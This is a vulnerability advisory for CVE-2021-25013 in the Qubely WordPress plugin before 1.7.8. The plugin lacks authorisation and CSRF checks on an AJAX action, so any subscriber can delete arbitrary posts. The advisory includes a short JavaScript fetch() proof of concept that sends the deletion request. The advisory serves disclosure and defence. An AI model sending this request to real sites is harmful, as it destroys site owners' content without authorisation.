Qubely < 1.7.8 – Subscriber+ Arbitrary Post Deletion | CVE 2021-25013 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF check on the qubely_delete_saved_block AJAX action, and does not ensure that the block to be deleted belong to the plugin, as a result, any authenticated users, such as subscriber can delete arbitrary posts

Note: v1.7.7 added capability check, CSRF check were added in 1.7.8

Proof of Concept

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=qubely_delete_saved_block&block_id=1",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

Fixed in 1.7.8

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

e88b7a70-ee71-439f-b3c6-0300adb980b0

Timeline

Publicly Published

2021-12-27 (about 4 years ago)

Added

2021-12-27 (about 4 years ago)

Last Updated

2022-04-09 (about 3 years ago)

Other

Published

Title

Published

2025-04-16

Title

Dynamic Post <= 5.02 - Subscriber+ Settings Update

Published

2025-08-21

Title

Spacious < 1.9.12 - Missing Authorization to Autheticated (Subscriber+) Demo Data Import

Published

2023-08-17

Title

Simple Org Chart < 2.3.5 - Unauthenticated Tree Settings Update

Published

2025-01-14

Title

VOD Infomaniak < 1.5.10 - Missing Authorization

Published

2024-02-06

Title

Quiz Maker < 6.5.2.5 - Missing Authorization to Unauthenticated Quiz Data Retrieval